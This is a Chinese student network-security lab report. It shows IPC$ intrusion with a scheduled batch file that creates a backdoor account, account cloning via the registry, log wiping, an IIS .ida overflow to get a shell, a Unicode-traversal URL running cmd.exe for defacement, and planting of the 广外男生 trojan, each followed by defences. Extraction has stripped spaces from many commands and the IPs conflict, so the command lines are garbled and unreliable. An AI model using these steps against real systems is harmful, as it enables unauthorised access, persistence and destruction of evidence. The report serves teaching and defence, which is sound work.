网络安全实验报告.docx

网络安全实验报告.docx

《网络安全实验报告.docx》由会员分享，可在线阅读，更多相关《网络安全实验报告.docx（37页珍藏版）》请在冰豆网上搜索。

网络安全实验报告

网络安全实验报告

信息与科学技术学院

学生上机实验报告

课程名称：

计算机网络安全

开课学期：

2015——2016学年

开课班级：

2013级网络工程

（2）班

教师姓名：

孙老师

学生姓名：

罗志祥

二、使用工具获取到达的结构信息

三、获取局域网内主机IP的资源信息

1.ping-aIP获得主机名；

stat-aIP获得所在域以及其他信息；

viewIP获得共享资源；

4.nbtstataIP获得所在域以及其他信息；

四、使用X-SCAN扫描局域网内主机IP；

1.设置扫描参数的地址范围；

2.在扫描模块中设置要扫描的项目；

3.设置并发扫描参数；

4.扫描跳过没有响应的主机；

5.设置要扫描的端口级检测端口；

6.开始扫描并查看扫描报告；

实验二、IPC$入侵的防护

【实验目的】

•掌握IPC$连接的防护手段

•了解利用IPC$连接进行远程文件操作的方法

•了解利用IPC$连接入侵主机的方法

【实验步骤】

一：

IPC$连接的建立与断开

通过IPC$连接远程主机的条件是已获得目标主机管理员的账号和密码。

1.单击“开始”-----“运行”，在“运行”对话框中输入“cmd”

1.建立IPC$连接，键入命令netuse\\192.168.213.128\ipc$123/user:

administrator

2.映射网络驱动器，使用命令：

netusey:

\\192.168.92.132\c$

1.映射成功后，打开“我的电脑”，会发现多了一个y盘，该磁盘即为目标主机的C盘

1.在该磁盘中的操作就像对本地磁盘操作一

1.断开连接，键入netuse*/del命令，断开所有的连接

1.通过命令netuse\\目标主机IP\ipc$/del可以删除指定目标IP的IPC$连接。

•建立后门账号

1.编写BAT文件，内容与文件名如下，格式改为：

.bat

1.与目标主机建立IPC$连接

2.复制文件到目标主机。

（或映射驱动器后直接将hack.bat放入目标主机的C盘中）

1.打开DOS窗口，键入命令：

copyc:

\hack.bat\\192.168.92.132\c$命令成功后，就已经把c盘下的hack.bat文件拷贝到192.168.92.132的C盘内。

1.通过计划任务使远程主机执行hack.bat文件，键入命令：

nettime\\192.168.92.132，查看目标主机的时间。

1.如图，目标主机的系统时间为13:

45，则可键入命令：

at\\192.168.92.13213：

52c:

\hack.bat，然后断开IPC$连接。

1.验证账号是否成功建立。

等一段时间后，估计远程主机已经执行了hack.bat文件，通过建立IPC$连接来验证是否成功建立“sysback”账号:

建立IPC$连接，键入命令netuse\\192.168.92.132\ipc$123/user:

sysback

1.若连接成功，说明管理员账号“sysback”已经成功建立连接。

安全解决方案

1.在PC（192.168.92.132）删除默认共享，通过netshare了解共享资源。

1.建立bat文件，文件名为：

noshare.bat，内容如下：

1.将其复制到本机“开始”-----“程序”-----“启动”中。

2.禁止空连接，将该命令“netstopserver/y”加入noshare.bat文件中或打开“控制面板”----“管理工具”------“服务”，找到server,单击右键，选择属性，选择“禁用”。

【实验报告】

1.与远程主机建立IPC需要满足什么条件？

答：

（1）己方和对方的计算机都连接到了互联网，并且知道对方计算机的IP，知道对方计算机的管理员账号和密码（IPC$空连接除外）

（2）对方没有通过禁用IPC$连接、禁用139和445端口、使用防火墙等方式来阻止IPC$。

（3）对方计算机开启了相关的IPC$服务，例如RPC服务（remoteprocedurecall）、Server服务等。

（4）本地计算机操作系统不能使用Windows95/98，因为Windows95/98默认是禁用本地IPC$服务的。

2、建立了IPC$连接能够做哪些工作？

答：

能映射驱动器，像在本机上一样的操作目标机的驱动器，能上传下载文件，能建立新的账号，能克隆账号等。

实验三、留后门与清脚印的防范

【实验目的】

●了解帐号后门以及防范手段

●掌握手工克隆帐号原理

●掌握日志清除的防范方法

【实验需求】

●计算机两台，要求安装Windows2000操作系统

●交换机一台、直连线两根

●权限提升工具PSU.exe

【实验步骤】

预步骤：

建立IPC连接，映射驱动器，上传PSU.exe到目标主机

一、设置隐藏帐号

1、试运行权限提升工具PSU.exe测试结果如图

2、进入任务管理器，查看SYSTEM的PID号如图PID为

3、使用PSU工具把它加载到注册表中

4、在注册表中找到存放系统帐号名称以及配置信息的注册项。

5、找到Administrator查看他的类型如图.它的类型为0x1f4

6、打开系统管理员的权限里面的F项把里面的16进制数据复制

7、使用刚才的方法找到GUEST用户打开相同的项把刚才复制的16进制数据粘贴进去

8为了隐蔽性我们把GUEST帐号禁用首先在命令行模式下键入”netuserguest/active:

no。

9下面我们来看下当前Guest帐号的状态在命令行下输入“netuserGuest”。

由图3-10可以看出Guest用户只属于Guest组，接下来打开计算机管理中的帐号中的帐号管理可以发现Guest用户已经被禁用了。

10注销后用Guest帐号登陆发现桌面配置与Administrator用户完全一样，下面我们用这个帐号执行一个只有系统管理员才有权执行的操作，如果成功那表示这个帐号后门可用

二、清除日志：

1、首先制作一个DOS下的批处理文件用于删除所有的日志，把它保存为.bat文件

2置它的运行时间

3通过检查被攻击主机的日志信息，可以发现内容为空

在入侵到对方的服务器之后，IIS将会详细地记录下入侵者入侵的全部过程。

在IIS中，WWW日志默认的存储位置是C:

\windows\system32\logfiles\w3svc1\，每天都产生一个新日志。

可以在命令提示符窗口中通过"del*.*"命令来清除日志文件，但这个方法删除不掉当天的日志，这是因为w3svc（即WorldWideWebPublishing）服务还在运行着。

（1）可以用“netstopw3svc”命令把这个服务停止之后，

（2）再用“del*.*”命令，就可以清除当天的日志了，

（3）最后用“netstartw3svc”命令再启动w3svc服务就可以了。

注意：

删除日志前要先停止相应的服务，再进行删除，日志删除后务必要记得再打开相应的服务。

也可修改目标计算机中的日志文件，其中WWW日志文件存放在w3svc1文件夹下，FTP日志文件存放在msftpsvc文件夹下，每个日志都是以exXXXXXX.log为命名的（其中xxxxxx代表日期）。

FTP日志的默认存储位置为C:

\windows\system32\logfiles\msftpsvc1\，其清除方法WWW日志的方法类似，只是所要停止的服务不同：

（1）在命令提示符窗口中运行"netstopmstfpsvc"命令即可停掉msftpsvc服务。

（2）运行"del*.*"命令或找到日志文件，并将其内容删除。

（3）最后通过运行"netstartmsftpsvc"命令，再打开msftpsvc服务即可

三、安全解决方案

1、杜绝Guest帐户的入侵。

可以禁用或彻底删除Guest帐户，但在某些必须使用到Guest帐户的情况下，就需要通过其它途径来做好防御工作了。

首先要给Guest设一个强壮的密码，然后详细设置Guest帐户对物理路径的访问权限（注意磁盘必须是NTFS分区）。

例如禁止Guest帐户访问系统文件夹。

可以右击“WINNT”文件夹，在弹出菜单中选择“安全”标签，从中可看到可以访问此文件夹的所有用户。

删除管理员之外的所有用户即可

2、日志文件的保护。

首先找出日志文件默认位置，以管理员身份登录进系统，并在该系统的桌面中依次单击“开始”－“运行”命令，在弹出的系统运行对话框中，输入字符串命令“compmgmt.msc”，单击“确定”按钮后打开服务器系统的计算机管理窗口。

3、其次在该管理窗口的左侧显示窗格中，用鼠标逐一展开“系统工具”－“事件查看器”分支项目，在“事件查看器”分支项目下面我们会看到“系统”、“安全性”以及“应用程序”这三个选项。

要查看系统日志文件的默认存放位置时，我们可以直接用鼠标右键单击“事件查看器”分支项目下面的“应用程序”选项，从随后弹出的快捷菜单中执行“属性”命令。

在该窗口的常规标签页面中，我们可以看到本地日志文件的默认存放位置为“C:

\WINDOWS\system32\config\AppEvent.Evt”

4、做好日志文件挪移准备，为了让服务器的日志文件不被外人随意访问，我们必须让日志文件挪移到一个其他人根本无法找到的地方，例如可以到E分区的一个“E:

\aaa\”目录下面创建一个“bbb”目录

5、正式挪移日志文件，将对应的日志文件从原始位置直接拷贝到新目录位置“E:

\aaa\bbb\”下

6、修改系统注册表做好服务器系统与日志文件的关联，依次单击系统桌面中的“开始”－“运行”命令，在弹出的系统运行对话框中，输入注册表编辑命令“regedit”，单击回车键后，打开系统的注册表编辑窗口；用鼠标双击“HKEY_LOCAL_MACHINE”注册表子键，在随后展开的注册表分支下面依次选择“SYSTEM”、“CurrentControlSet”、“Services”、Eventlog”项目，在对应“Eventlog”项目下面我们会看到“System”、“Security”、“Application”这三个选项

7、在对应“System”注册表项目的右侧显示区域中，用鼠标双击“File”键值，打开如图2所示的数值设置对话框，然后在“数值数据”文本框中，输入“E:

\aaa\bbb\SysEvent.Evt”字符串内容，也就是输入系统日志文件新的路径信息，最后单击“确定”按钮；同样地，我们可以将“Security”、“Application”下面的“File”键值依次修改为“E:

\aaa\bbb\SecEvent.Evt”、“E:

\aaa\bbb\AppEvent.Evt”，最后按一下键盘中的F5功能键刷新一下系统注册表，就能使系统日志文件的关联设置生效了

实验小结

1.账号克隆是什么意思？

答：

在注册表中有两处保存了账号的SID相对标志符，一处是注册表HKEY_LOCAL_MACHINE\SAM\AMDomains\AccountUsers下的子键名，另一处是该子键的子项F的值。

但微软犯了个不同步它们的错误，登录时用的是后者，查询时用前者。

当用Administrator的F项覆盖其他账号的F项后，就造成了账号是管理员权限，但查询还是原来状态的情况，这就是所谓的克隆账号。

实验四、基于IIS服务器攻击的防护

【实验目的】

●练习使用X-ScanV3.3GUI扫描工具；

●了解不同漏洞的入侵方式，并掌握各种漏洞解决方案

【实验内容】

●练习基于*.ida的入侵

●练习基于.printer漏洞的入侵

●练习基于Unicode漏洞的入侵

【实验工具】

●本地主机不限制操作系统

●远程主机操作系统：

Windows2000或Windows2000Sp1或Windows2000Sp2

●工具X-ScanV3.3GUI、idahack.exe或ida.exe——IDA溢出工具、iisx.exe、tftpd32.exe

【实验步骤】

一、基于*.ida漏洞的入侵

1、扫描远程服务器，寻找有漏洞的主机。

打开X-scan，扫描项目，开始扫描远程主机。

扫描完毕后，在扫描报告中，发现远程服务器192.168.213.128存在IIS.IDAISAPI过滤器漏洞，

在浏览器的地址栏中输入http:

//192.168.59.131/*.ida”,返回信息“文件c:

\inetpub\wwwroot\*.ida。

文件名、目录名或卷标语法不正确。

确认远程主机存在漏洞，并得到远程服务器提供Web服务的根目录是c:

\inetpub\wwwroot。

2、IDA溢出，将工具IDAHack.exe拷贝到%systemroot%/system32目录下。

通过“运行”—“cmd”打开命令提示符，在命令行下输入“idahack192.168.59.131804520，打开端口号520等待Telnet登录。

3、Telnet登录，在MS-DOS中键入“telnet192.168.59.131520”命令远程登录服务器如该telnet登录并无身份验证，如果登录成功，立即得到SHELL，该SHELL拥有管理员权限，可以在其中执行任何命令。

输入telnet命令

4、建立帐号,如图4-5入侵成功后，在远程服务器上建立管理员帐号，此时，入侵者便获得了一个远程主机上的管理员帐号，可以通过系统认证来“合法”地使用“计算机管理”或“DameWare”等工具远程控制服务器，并且在远程服务器上添加了后门帐号

5、使用“exit”命令退出登录。

6、防护为Windows2000操作系统打SP4补丁。

Windows2000ServicePack4的下载地址是

（2）为该漏洞安装补丁WindowsNT4.0的补丁下载网址：

Windows2000Professional/Server/AdvancedServer的补丁下载网址：

WindowsXPbeta在正式版本得到解决。

（3）删除.ida&.idq的脚本映射建议：

即使已经为该漏洞安装了补丁最好还是删除.IDA映射。

删除方法：

打开Internet服务管理器；右击服务器并在菜单中选择“属性”；选择“主属性”，选择WWW服务->编辑->主目录->配置，在扩展名列表中删除.ida和.idq项。

二、基于.printer漏洞的入侵

1、使用X-Scan工具扫描远程服务器

2、使用iisx.exe工具连接有.printer漏洞的主机192.168.59.131

3、执行Telnet命令：

Telnet192.168.213.1287788，入侵远程主机。

使用工具溢出没成功，工具针对中文版win2000

4、在远程主机上创建管理员后门帐号

5、使用“exit”命令退出登录。

6、防护

（1）为Windows2000操作系统打SP4补丁。

Windows2000ServicePack4的下载地址是：

（2）安装漏洞补丁。

该漏洞补丁的下载地址是

三、“涂鸦”主页

1、准备标语。

用网页设计软件，如DreamWeaver、FrontPage制作一个标语网页，保存为ty.htm。

2、探知远程服务器的web根目录。

首先查找被修改主页文件保存在哪里。

利用Unicode漏洞找出Web根目录所在。

通过查找文件的方法找到远程服务器的Web根目录。

在IE中输入http:

//192.168.59.131/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?

/c+dir，其中“/s”参数加在dir命令后表示查找指定文件或文件夹的物理路径，所以“dir+c:

\mmc·gif”表示在远程服务器的C盘中查找mmc.gif文件。

由于文件mmc.gif是IIS默认安装在Web根目录中,所以在找到该文件的同时，也就找到了Web根目录。

（1）为避免该类攻击，建议下载最新补丁

（2）安装IISLockdown和URLScan来加固系统，从而避免该类攻击。

（3）安装Windows2000的ServicePack2以上的版本。

）

3、涂鸦主页。

涂鸦主页之前，可以利用Unicode漏洞，在地址栏中输入

http:

//192.168.59.131/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?

/c+dir+c:

\inetpub\wwwroot来遍历根目录下的文件。

通常主页的文件名一般是index.htm，index.html，default.asp，default.htm等。

远程主机的主页是index.htm。

因此，此时只需要将我们制作的标语文件1.htm上传到远程主Web根目录下覆盖掉index.htm就可以了。

使用命令覆盖远程主机上的主页文件。

已经完成上传文件的任务

4、重新登录远程主机的网站。

刷新后，即可看到刚才下载到目标主机的标语文件，“涂鸦”主页成功

5、防护

（1）为Windows2000操作系统打SP4补丁。

Windows2000ServicePack4的下载地址是

（2）安装漏洞补丁。

该漏洞补丁的下载地址是以使用文中所提供的该漏洞补丁的下载地址）。

在该页面中选择与自己的操作系统相应的补丁下载并安装。

例如如果所使用的操作系统是简体中文版，且IIS的版本是5.0，则选择该页面中的“Chinese（Simplified）LanguageVersion”下载并安装即可。

（3）临时解决方法。

如果不需要可执行的CGI，可以删除可执行虚拟目录，例如/scripts等。

如果确实需要可执行的虚拟目录，建议可执行虚拟目录单独在一个分区。

【实验报告】

1、请简述IIS漏洞有哪些？

答：

IIS漏洞据说有近千种，其中能被用来入侵的漏洞大多属于“溢出”

型，入侵者能通过发送特定格式的数据来是远程服务器缓冲区溢出，从而突破系统保护在溢出后的空间的执行任意命令。

IIS漏洞中，主要有5中漏洞：

.ida&.idq漏洞，printer漏洞，Unicode漏洞，asp映射分块编码漏洞，webdav漏洞。

注：

成功地建立Telnet连接，除了要求掌握远程计算机上的账号和密码外，还需要远程计算机已经开启“Telnet服务”，并去除NTLM验证。

也可以使用专门的Telnet工具来进行连接，比如STERM，CTERM等工具

实验五、第四代木马的防御

【实验目的】

●了解第四代木马的特点；

●了解反弹技术及连接方式；

●掌握第四代木马广外男生的防范技术；

【实验设备】

●操作系统平台：

Win2000或WinXp。

●木马工具：

广外男生。

【实验原理】

广外男生同广外女生一样，是广东外语外贸大学的作品，是一个专业级的远程控制及网络监控工具。

广外男生除了具有一般普通木马应该具有的特点以外，

还具备以下特色客户端模仿Windows资源管理器：

除了全面支持访问远程服务器端的文件系统，也同时支持通过对方的“网上邻居”访问对方内部网其他机器的共享资源。

强大的文件操作功能：

可以对远程机器进行建立文件夹，整个文件夹的一次删除，支持多选的上传、下载等基本功能。

同时支持对远程文件的高速查找，并且可以对查找的结果进行下载和删除操作。

运用了“反弹端口”与“线程插入”技术：

使用了目前流行的反弹端口的木马技术，可以在互联网上访问到局域网里通过NAT代理上网的电脑，轻松穿越防火墙。

“线程插入”技术是指在服务器端运行时没有进程，所有网络操作均插入到其它应用程序的进程中完成。

因此，服务器端的防火墙无法进行有效的警告和拦截。

“反弹端口”技术是指，连接的建立不再由客户端主动要求连接，而是由服务器端来完成，这种连接过程正好与传统连接方式相反。

当远程主机被种植了木马之后，木马服务器在远程主机上线之后主动寻找客户端建立连接，客户端的开放端口在服务器的连接请求后进行连接、通信。

【实验步骤】

一、广外男生的基本使用

1、打开广外男生客户端（gwboy092.exe），选择“设置”—>“客户端设置”打开“广外男生客户端设置程序”

2.其中最大连接数一般使用默认的30台，客户端使用端口一般设置成80

3、点击“下一步”，再点击“完成”按钮结束客户端的设置

4、服务端设置：

进行服务端设置时，选择“设置”—>“服务器设置”，打开“广外男生服务端生成向导

5.选择“同意”之后，点击下一步，开始进行服务端常规设置，其中，EXE文件名是安装木马后生成的程序名称，DLL文件名是安装木马后生成的DLL文件的名称

6、设置完成后点击“下一步”，进行“网络设置”。

根据实际网络环境，选择静态IP选项进行实际网络的设置

7、设置完成点击“下一步”，填写生成服务器端的目标文件的名称，然后点击“完成”，结束服务器端的配置

8、种植木马：

将生成的目标文件发送到远程主机，然后在远程主机运行。

命令方式：

Copygwboy0092.exe\\192.168.59.131\c$

9、重新启动远程主机，在客户端进行观察等待远程主机的连接，并对远程主机的运行进行监控。

可见服务器与客户端连接成功；

客户端看到的远程主机的文件系统